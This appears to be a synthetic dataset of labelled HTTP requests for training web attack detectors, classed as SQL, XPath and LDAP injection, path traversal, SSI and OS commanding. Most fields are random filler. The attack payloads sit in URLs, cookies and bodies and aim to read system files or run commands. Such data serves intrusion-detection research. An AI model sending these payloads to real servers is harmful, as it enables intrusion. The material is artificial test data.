Client-ip: 200.103.37.162
Cookie: ewai=opunbhm;oyHrthedI=mn'ialn0emsds1;eYi3=nepOSlQw;cysilMrocgt00=naSTjk
Cookie2: $Version="054"
Date: Sat, 24 Apr 04 20:31:13 UTC
ETag: "5T3Rz7Rc1UrCuOe2gb"
Expect: 100-continue
From: rlNe@ecetad6.fr
If-Modified-Since: Tue, 27 Apr 10 12:29:21 UTC
If-Unmodified-Since: Mon, 31 May 04 03:18:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.7
Pragma: dwhjmsh=alInyo
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest uri=http://spfa.biz/mzembeOq/usguCen/etlmac.exe
Range: 9-,057-2,501963-763
Referer: http://www.8hmnfh.ch/ahwNj/nekse/hoodt9iC/neee/sh8d3fwy.tiff
TE: chunked
Trailer: Date
User-Agent: Mozilla/0.8 (Windows; U; Windows NT 3.1; ni-ae; rv:3.4.1) Gecko/40376261
UA-CPU: PowerPC
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: 2.8 9.132.188.193:3, FTP/1.7 140.100.115.49
Transfer-Encoding: gzip
Upgrade: 1eEw/6.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 147.116.190.16
X-Serial-Number: 399335844567
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47733
Start - Id: 35106
class: SqlInjection
GET /ksTlsyarpecwAmoIz/_S._4DTpositionvHaQ5/hN2KWRs@jln_eUzs3/Rr67qdibe/iflO4msy9ecmre/cPhOBs9QXNcn/etmftansreOh/tatexsuat/fHTnrVkYFbcG2Q.html?y@fIVbody.DF=itn&ioc=7&B4y4fRyG=88852678 HTTP/1.0
Host: www.rasmlme5.com
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: c-ddoadksi, iaOeipry-naurtDr, r-rTro;q=0.4, eDtpua-elattsu;q=0.5, lLiaUa-w
Cache-Control: no-transform
Client-ip: 85.43.136.15
Cookie: ihttTmn8=akdeOcxtermae;eertdnaEshrp=U8tse5e' UNION     ALL SELECT     nr   FROM   ieb  WHERE ''  =';stcApqayaazivo4=s5i9c2aa5wjynzwo;Ae=ttnbs;Ekjob5ownmale=tsgt>ts- Micsh
Cookie2: $Version="881"
Date: Thu, 05 Apr 07 02:51:28 CET
ETag: W/"81loHr9KD.A9I2L"
From: tTr0@lIe8cdv.be
If-Modified-Since: Thu, 22 Jan 09 21:50:25 UTC
If-Unmodified-Since: Tue, 30 Sep 08 22:45:37 CET
If-Match: "ZCYkkLGIC21kQQ_QIE"
If-None-Match: *
If-Range: Sun, 09 May 04 04:35:55 UTC
Max-Forwards: 559
Proxy-Authorization: 4jeeY frnt=3ai5
Authorization: Digest username="onacnday"
Range: 1474-,6761-8
Referer: /aentce6/nyha/6nib/g0igs.asmx
TE: deflate,trailers,trailers
Trailer: Trailer
User-Agent: wotvtc (0JjUbh)
UA-CPU: Sparc
UA-Pixels: 2650x223
Via: HTTP/0.4 www.wcsee.tiff, 0.4 www.esr6nA.css
Upgrade: rss/3.7, haei/8.7
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35106
Start - Id: 44767
class: PathTransversal
GET /ITvbscript@lvHCQ-pcwp-f/leta42V/ooN3zT/b0GyFctlRLnaUBToaB9/i9htrotecresaj/npEyssEts2Ehlqso/tun6tw9zQlwutH/w.QjPIH@f.y_.pC4Vr/58FZ2MLJjnW.sh?tuXh=040238&sgtpswam=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e HTTP/1.0
Host: www.olme5rere.cz:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.6
Accept-Language: LenNg-ass3oi, 2wSaeTe-ipneo, r6njxcmk-hhmctrtq;q=0.0, fd-ot0c2, bgisjl27-ey;q=0.3
Cache-Control: only-if-cached
Client-ip: 22.201.213.145
Cookie: GEG5xtHYjK=~a(ml'atudi o;NExOexecIo=42441
Cookie2: $Version="18"
Date: Wed, 10 Jan 07 07:03:35 CET
ETag: W/"asmYO.K.bOUh@aF"
Expect: ammm
From: Strga@kmekoca.fr
If-Modified-Since: Sat, 27 Dec 08 07:20:09 CET
If-Unmodified-Since: Sun, 12 Feb 06 20:45:36 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 9
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: NTLM ZGlveUl0bXRJbG9zZDlpYWRuZ0l1c3Rlbm13Y0V6RXNoc2lsZGVycG5vbUU=
Range: 6578-336232,-258470,45228-5909
Referer: http://rrr9a.st/Jft6tdu/ieap/bp9ermue/sifrr8rr.php3
TE: deflate
Trailer: TE
User-Agent: Mozilla/2.1 (X11; U; Linux i586 3.4; 42-sa; rv:4.6.8) Gecko/96891144
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 332x3916
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: get/0.4, rgtf/4.9, Eac8/3.7, zbsjne/6.4, erdN/2.3
Warning: 075 226.115.253.85 "3EIasrapsapthhse" "Sun, 24 Oct 04 16:27:54 CET"
X-Forwarded-For: 177.203.165.156
X-Serial-Number: 29099
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 44767
Start - Id: 42797
class: SqlInjection
POST /SaRmetaFs3echoJOT/t7fxP0/ErJdrop.-N0dNdivshutdownBe/e2ecg3ecBse/yw12CmPiGpTz6Z/8eceinr/wZViYeH5JzPDo/lbin.fW/hTe7R1ai0n.js? HTTP/1.1
Content-Length: 143
Content-Language: iotkh,o
Content-Encoding: compress
Content-MD5: bmh6a2V0bWdhdFB4YTBJeQ==
Content-Type: application/x-www-form-urlencoded
Host: www.oe3rpIce2n.com
Connection: close
Accept: application/zip;q=0.2, image/jpeg
Accept-Charset: x-mac-arabic;q=0.6, iso-8859-2;q=0.1, x-mac-cyrillic, koi8;q=0.4, hz-gb-2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7372
Cookie: htobocEqpttsco= n3%-nulbotko7eifcxo;znkoItmpTO=eSufO;ra9srDc=wC9JZ;ktzeLf='    OR 'ldmeeAl'    =  't2et'+'d3ee'
Date: Sun, 17 Feb 08 17:07:40 CET
Pragma: foh=xe2Ee2
Referer: /tOag/lts2Toc8.cfm
User-Agent: AsLscohqs/3.8

roo3cH6auhlhieE=H20nqlibaen3o3a&jIo0=4x&dIi2nesTb=hJAyoY86FH&SunionVc=894666&liar2ddaatl=sIKOZPh0KGC&sepamd=[&otpnobaaaIr=y&seqr=iaaccept

End - Id: 42797
Start - Id: 45118
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: 111.64.178.224
Connection: keep-alive
Accept: audio/*;q=0.1, video/*
Accept-Charset: utf-8;q=0.1, windows-1253;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 172.61.131.171
Cookie: ndeinet8izPIk=lrnM1;fni=0759297;PXxmlKl0r=cTS&es :++Atscriptnnwto 7;ot7ineN=4CPsb3y2
Cookie2: $Version="35"
Date: Mon, 04 Jan 10 18:29:15 GMT
ETag: "5IS3QranKGG1lAVdU"
Expect: uhxrdEf=ynXs4rl3
From: lmfapce@abHed.be
If-Modified-Since: Fri, 30 Dec 05 12:13:28 GMT
If-Unmodified-Since: Fri, 03 Dec 04 21:12:01 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Jun 04 04:28:51 GMT
Max-Forwards: 00
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: http://www.ldvsysen.be/ebai/t4aelt/ehEgd5iz/mauiszem/3lee.php3
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.0 (X11; U; Solaris 4.2; is-ea; rv:0.7.5) Gecko/60386822
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: lbc/5.9 43.64.193.222, HTTP/0.9 133.29.83.73:6
Transfer-Encoding: gzip
Upgrade: tist/2.4, eyl/9.6
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45118
Start - Id: 35706
class: XPathInjection
GET /Ontutad/4mucE6xrgqtgwoitx/wdur/lF/shaemhh7sqetru4Rtf.jpg?YWujkEuK=7n4inj4pehRgi&WKservicesQiframe=3485581&odlnGaMWWuo=nl%2Fda%2Fpnlh%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D79%5D+++or+++%27e4%27%3D+%27&0EdocumentWZE6IA2wT=o%25o&scriptopts.0a=s&en=22943&formSpXJWcopyG.t=e%7Eetaht%7C%28loz- HTTP/1.0
Host: www.smqharyo9.biz
Connection: rtB6ata
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 249.242.173.190
Cookie: l5updateMkL2oWk=oformg6U\;2Ncplov=7780890;kaMu=6q06lvF;es5eHehmirza6ce=49748812;rtnAnwi=686833
Cookie2: $Version="52"
Date: Sat, 29 Dec 07 17:35:11 UTC
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: 0iiTea@WooaceteB.de
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Wed, 02 Jun 04 07:31:55 GMT
If-Match: "BMF6hLDOVgNnU1O7Vjw"
If-None-Match: "Flzf1U4IT.xEqpmp1ncI"
If-Range: Thu, 04 Aug 05 06:13:09 UTC
Max-Forwards: 277
MIME-Version: 3.9
Pragma: 6tlirn=dI99Re
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: /em1iet/sttc.sh
TE: chunked,deflate;q=0.6,deflate
Trailer: User-Agent
User-Agent: Mozilla/6.6 (compatible; Konqueror/9.3; Linux i586; aseat)
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 656x763
Via: 4.6 221.235.251.50, 4.9 www.gitsten.css, HTTP/7.3 72.125.189.113
Transfer-Encoding: seteA
Upgrade: acPhne/6.3, xettw/7.0
Warning: 497 www.suB9rrh.png "orshmmmaTi2orsdnwe" "Sun, 22 Nov 09 02:52:27 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35706
Start - Id: 39806
class: SSI
GET /turntta/atmohoyifeEtimn8Ki/6mErgcov/g7oabh3teac/vheh0iilnw/ns/lN@LNnraSlocation0K.Hy/Asnode14ggq/Im/14h2irnn4dtfkSa9/ispmdlIeTsmePndypnd.aspx?eloeU=%3C%21--%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&suhhre=seQnCN_39Oz&cHvRtWb_SUi=tyaU.t&enahyfE8pwan=oIaTv%40G4_i&lqolog3=I%25uea&aN=aCabJd74ji&isot9uytLe8s=otnsn4m2aouee1a&xeg8otne=10&wevlbl=59&crt3etjss=0618937 HTTP/1.0
Host: www.tmBaeyfTqh.gov
Connection: tfoss
Accept: */*
Accept-Charset: windows-1254, euc-kr;q=0.6, gb2312;q=0.0, iso-8859-5, iso-8859-2
Accept-Encoding: 
Accept-Language: ubft-poWrfn;q=0.6, cqh1anye-6piiueon, ea-aosh
Cache-Control: no-transform
Client-ip: 55.210.28.99
Cookie: 2QWMY4YZ1=2tI esteypaSrug;rhaHreszoaaax37=RiElipA;ms-G=1973;rtnryolitobe0=eDassoeiey
Cookie2: $Version="64"
Date: Tue, 26 Dec 06 22:21:29 GMT
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: 100-continue
From: bny0t2@rj5o.gov
If-Modified-Since: Tue, 08 Dec 09 20:47:00 GMT
If-Unmodified-Since: Thu, 06 Nov 08 06:28:18 GMT
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: "3kyYmsqGzmoswxseG"
Max-Forwards: 9776
MIME-Version: 1.9
Pragma: rw3leUg=iose0
Proxy-Authorization: thos inow=tceine
Authorization: Basic bzRhZzpIazdSdGFpaA==
Range: 2975-
Referer: /irEr0/rolsurfo/aao66T2i/haru8btz/gffwhe.jpeg
TE: deflate;q=0.4,gzip;q=0.6,trailers
Trailer: Connection
User-Agent: baiiatp/5.2.9.9.8
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: 3.0 223.213.41.58:544, HTTP/1.3 144.44.248.41, FTP/6.0 250.151.244.186
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 410 230.107.4.184 "ldn6oohitmEt6c" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39806
Start - Id: 41510
class: SqlInjection
PUT /nCr.oFA9E/c4eaNdiseK/stg/a4yqUzD06allpUVy/e5RG3US6p.bin? HTTP/1.0
Content-Length: 152
Content-Language: rG8aatle,eas,aa
Content-Encoding: identity
Content-Location: /gStns.asmx
Content-MD5: ZXVnYXNmZHE1aG8ybmltaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 May 05 09:21:25 UTC
Last-Modified: Sun, 25 Sep 05 24:33:50 UTC
Host: 2.52.252.194:5968
Connection: keep-alive
Accept: text/*;q=0.8, audio/x-wav, audio/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: 6S-zElEi40t;q=0.1
Cache-Control: max-age=183
Client-ip: 3.29.1.103
Cookie: h0tc=eemmeamf5md;esomlhIg3yleee=np_;dh=neHcPJto
Cookie2: $Version="3"
Date: Sat, 28 Oct 06 04:39:41 GMT
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Sat, 05 Apr 08 02:41:36 UTC
If-Unmodified-Since: Wed, 19 Dec 07 19:03:33 UTC
If-Match: *
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: "64dO49Kdaw1CfECuFP1"
Max-Forwards: 1
MIME-Version: 9.8
Pragma: tRtc9iaa='enssm'
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: Digest nonce
Range: 229-94,-0,-455
Referer: /o15esb.png
TE: gzip,chunked
Trailer: User-Agent
User-Agent: th0JG@9P http://www.oeeuhlac.biz
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: 3.9 www.ng5nlt.tiff, 3ti/0.5 www.xniunjck.shtml, Dsrcq/7.8 www.iemr.html
Transfer-Encoding: compress
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hbrwen0=ccH&_dOoF=g&motjeriwbL=5&Mrz01yb='  UNION        ALL    SELECT   4sYIry     FROM sTnisj    WHERE     ''    =   '&eeeOaoutC9xd=tdir-Mtp

End - Id: 41510
Start - Id: 44256
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: www.anvraS.net
Connection: tfCsszta
Accept: image/gif;q=0.4
Accept-Charset: euc-kr;q=0.9, koi8
Accept-Encoding: compress, deflate, gzip, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 252.49.218.208
Cookie: CHb@5TT=?Ajtmp;yfe=~;dre9msfyheht=access_loghttpHaefadunionntqdh
Cookie2: $Version="045"
Date: Sun, 21 Jan 07 24:03:38 GMT
ETag: "XGf1wALBxBWK5lr7R"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Mon, 02 Apr 07 08:45:47 UTC
If-Unmodified-Since: Tue, 19 Feb 08 04:29:35 CET
If-Match: *
If-None-Match: *
If-Range: "yjt_cQpyaPEz45SK"
Max-Forwards: 14
MIME-Version: 3.0
Pragma: eyfphnui='sonoce'
Proxy-Authorization: NTLM aXU3aWFyc3Nham9pQml5b2VudE5waXJhc2VjbWhhWGNrZG5lc2hlcg==
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: /5aaAxs/ncuer/eloease0/nt7zna6.css
TE: gzip
Trailer: Accept-Language
User-Agent: qevtoree
UA-CPU: 68000
UA-Disp: 9864,838,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2727x437
Via: nkcs/7.2 1.115.211.237, 9.3 70.234.89.40, 9.4 www.sce6ti.htm
Transfer-Encoding: identity
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 226 1.81.131.108 "aituhaeselhhae" 
X-Forwarded-For: 152.199.223.60
X-Serial-Number: 87791101469123011682
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44256
Start - Id: 44909
class: PathTransversal
GET /deymg5eatgide.js?tcNT7pJL2L.2=9nTOd_%40eQ&weltNrstxderoit=denvmttwea&denassilt=doc%28+++file%3A%2F%2F%2Fc%3A%2FrmvmO%2FvhoaRa.xml++++%29&a7tfie=eDC8fsA&8xtermSimg0kmailPHKuR=lQj-lK&rinDowesz2=l%7EntSh%24Lo&tNaN3=ues7iraiibr2ee HTTP/1.1
Host: 200.55.119.156:8555
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: yyeNsp5i-an6w;q=0.6, PeeIeiUi-h;q=0.8, nEutt-wlI, t-tgei, enlq35h-Eu;q=0.1
Cache-Control: no-store
Client-ip: 81.216.187.19
Cookie: OautoexeceCDrrechok5Nlog=rme1eeaRNoCsxmlt;mailkGmdnullo3iU0=24
Cookie2: $Version="2"
Date: Sun, 05 Jun 05 02:32:05 GMT
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sat, 17 Apr 04 24:24:40 CET
If-Unmodified-Since: Fri, 08 Dec 06 21:31:13 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: Basic aDdmQTpvdWFlb3Aw
Range: 50635-77
Referer: http://www.dsaiZ.de/iBoilad/iy3dufp5/cnftIok/lehyt.jpeg
TE: trailers,gzip;q=0.5
Trailer: Transfer-Encoding
User-Agent: hlhml/6.8
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 3.6 118.2.60.187
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44909
Start - Id: 49785
class: XPathInjection
GET /eiek0nbhaembsnlphr/wp-6XB0K.msf?eaodwern=hsesaoexb&DrtTsr=n0Ks&MsExmlWos.u7S=86&onpTho8NceAetft=e8y&d5nittseanbei8=ednrtr%27+or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++++%27uuosdpit%27++%3D%27&ypsas=ul4c2&douiltLNze0rbe=7884&1ot=U+y+%3BjlzokLoa&ssi7=63124323&qzpiytH=wp-aftpm&gan=Fcsh&-ILDbHv@=+i&rcEeolauhecotz=3502&washatwaT=steselectrsdnebnsv HTTP/1.1
Host: www.tod2usrkwr.gov
Connection: stgit
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: het-esiir
Cache-Control: only-if-cached
Client-ip: 197.120.23.169
Cookie: ss64Rtrls9tr05=a13vnwiopqtfi;uhulvdttlo2ey=rt3xse;eHl2=3;etLt9sindddFi=ri;isutrgsawoecw=1m8iwp-like?n]5wds&n|0 
Cookie2: $Version="6"
Date: Tue, 27 May 08 17:43:56 UTC
ETag: "JQl-q5Ler@UUd1wq"
Expect: hekfnM
From: terol@hDey.ch
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Mon, 10 Dec 07 14:01:26 GMT
If-Match: "_VP_7BE4-Cxg7UlMqj"
If-None-Match: "BGEzR4kHxactQoU"
If-Range: Thu, 03 Jul 08 18:46:11 UTC
Max-Forwards: 96
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: 800674-0,376-429,12-
Referer: http://aNBoaee.fr/7tio/wDpbr/yyw1h1e9/t48tn/etlni.exe
TE: trailers,gzip;q=0.9,chunked;q=0.7
Trailer: Connection
User-Agent: asmataitsBt
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 742x2872
Via: 5.4 44.135.186.192:6212, FTP/7.0 www.vjle.gif, 8.1 www.adIlrHo.png
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49785
Start - Id: 45987
class: PathTransversal
PUT /ea2GEcb1.asmx? HTTP/1.0
Content-Length: 83
Content-Language: puf,Acega
Content-Encoding: deflate
Content-Location: http://www.RrModrze.be/tReyx/smfo5h/nitsh5E/aenyea.zip
Content-MD5: Z3dlcXU2a2RJaGVhamlTbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Sep 09 06:50:07 GMT
Last-Modified: Mon, 23 Apr 07 18:41:59 UTC
Host: www.5dTstrlr1.net
Connection: close
Accept: audio/*, application/postscript;q=0.0
Accept-Charset: x-mac-ce;q=0.0, x-mac-greek;q=0.4, windows-1250;q=0.8, iso-8859-9;q=0.9, iso-2022-kr;q=0.0
Accept-Encoding: S:\windows\boot.ini
Accept-Language: 8euu-styae6he
Cache-Control: no-store
Client-ip: 250.34.233.65
Cookie: 4AkJ=33q
Cookie2: $Version="279"
Date: Wed, 18 Oct 06 10:27:32 GMT
ETag: "iL.lhMF7FSpD_jLo"
Expect: vryairto=EsyalQi;presec=et2nWm
From: mtyt4ns@shaohiwie.it
If-Modified-Since: Fri, 04 May 07 08:19:16 UTC
If-Unmodified-Since: Thu, 16 Apr 09 15:26:10 GMT
If-Match: "V.E45t9g3D68@DVbyM"
If-None-Match: *
If-Range: Wed, 17 Nov 04 22:58:41 GMT
Max-Forwards: 70
MIME-Version: 4.4
Pragma: rw=in4eo
Proxy-Authorization: eelo uasuthoo=eyfL
Authorization: Basic SW12MHBmdG46dGhiYWVv
Range: -2042
Referer: /tCiies/Hh80.php
TE: trailers
Trailer: Via
User-Agent: a1oc/8.3
UA-Disp: 3697,5905,8
UA-Pixels: 705x843
Via: 5.1 www.eixuelhu.jpg, eagVs/8.8 www.og9el.tiff
Warning: 353 209.10.48.69 "8etwz7eHAfen" 
X-Serial-Number: 9739986
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hoae6eyp=0808&5echoR8KPn=9x8vSDiTCCaJ&iev=39482673&QH7ZstdinYwp-fnode=3@n&nh=8326

End - Id: 45987
Start - Id: 45265
class: PathTransversal
GET ////? HTTP/1.1
Host: 176.82.89.241
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Cookie2: $Version="684"
ETag: W/"kNV0ICg6OLH5qsWqn."
If-Modified-Since: Tue, 07 Nov 06 11:17:05 CET
If-Unmodified-Since: Fri, 24 Oct 08 14:01:02 UTC
Referer: /tsden/tu6fylm/tgia/lhjs.sh
User-Agent: yn5ool
----: --------------------------------------------------

null

End - Id: 45265
Start - Id: 43144
class: OsCommanding
GET /ns5SaedrOxmns2si9t/c7uHiYfGfWgV-AHXZBZ/steeof2/p2XZ.R2i78VClwfQEk/zBbQX-ryR7vfQ/l8htiirhreEoar4tza/40_ZekyOARZD4dCyi.tiff?iOUU=telnetoz&4KZc_Znph-=7-Wh&bnS=%2Fbin%2Fps%2500+++%7C HTTP/1.0
Host: 138.103.3.55
Connection: fn6etaia
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: OogzeofO-tn1Nhof, mae-ttp, k-tnno;q=0.3
Cache-Control: no-store
Client-ip: 44.100.206.106
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="11"
Date: Wed, 27 May 09 03:08:55 UTC
ETag: "xp7WlUFTEtl@0cqPOnSz"
Expect: riuusi2e=neiyivtb
From: agaiu@h1the.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Sun, 20 Jun 04 05:58:13 UTC
If-Match: *
If-None-Match: *
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 99
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: cenn vpwg=rlsiiwt
Authorization: edserI rUz4lnq=e8Ee9
Range: 46359-,93372-15,76-
Referer: /6hip/aie6edk.css
TE: chunked;q=0.2,gzip;q=0.3
Trailer: Expect
User-Agent: Mozilla/4.2 (Machintosh; U; Mac OS X 9.0; wf-it; rv:5.1.0) Gecko/17488376
UA-CPU: Sparc
UA-Disp: 391,012,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: 9.4 138.92.104.80:13
Transfer-Encoding: identity
Upgrade: sloat/8.4
Warning: 854 50.62.44.9:3189 "2eaaior" "Sat, 19 Feb 05 12:47:49 UTC"
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43144
Start - Id: 37093
class: LdapInjection
GET /eea/efRP/trsaIUdcmUtt5B/bCiurMWk/cieafhTfghan6z/egldtgeaeo5eittetaI/hR-.dll?taIhedw=j%5Cahjdg&6EBOCnY6oSa=87449684&dg=4984&nRa=ihncqtift1brrntA&ddropnK=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.ep2unedd.com
Connection: asvKk
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: rfas-ITtdem;q=0.7
Cache-Control: max-age=9
Client-ip: 237.22.129.42
Cookie: wrc=0d|h5intteasystemusipassthru7;oghaatie7bo=u_Q0cOC;ekcqxwyXFa6x=9Rhpw6iSowh/ngeayr
Cookie2: $Version="42"
Date: Tue, 27 Sep 05 09:22:45 UTC
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: 100-continue
From: isenqanI@dizsiba.uk
If-Modified-Since: Sat, 23 Aug 08 08:47:15 UTC
If-Unmodified-Since: Mon, 25 May 09 18:29:07 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 556
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM ZDlvc3NhZWFjZXltMHRuaW1qYm9lQURIbmR0b0EyeTRMbQ==
Authorization: s8Oir a6t0=et6SrTkg
Range: 087760-257003
Referer: http://www.taaabctS.de/xxirc/rcsiA.pl
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: mftbr6ibceoatum
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7857x018
Via: HTTP/1.1 www.vztiai2.png:67, 5.9 www.rrTtuweh.shtml:0
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 6212465353435599462
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37093
Start - Id: 40519
class: SSI
GET /wherems99/hEAj/e2R5Q@rURPUTI/nscat/dtorG/7WJD61Ar9HMIhSE/m5ias/pA1Wq/shYtHJw._s.4D/XLIkHIHP3/iafDttSTyf4k4c0ujP/lta9ktnau.png?e3yoYL9A=%3C%21--+++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&8B=8t HTTP/1.1
Host: 205.65.6.47
Connection: close
Accept: video/*
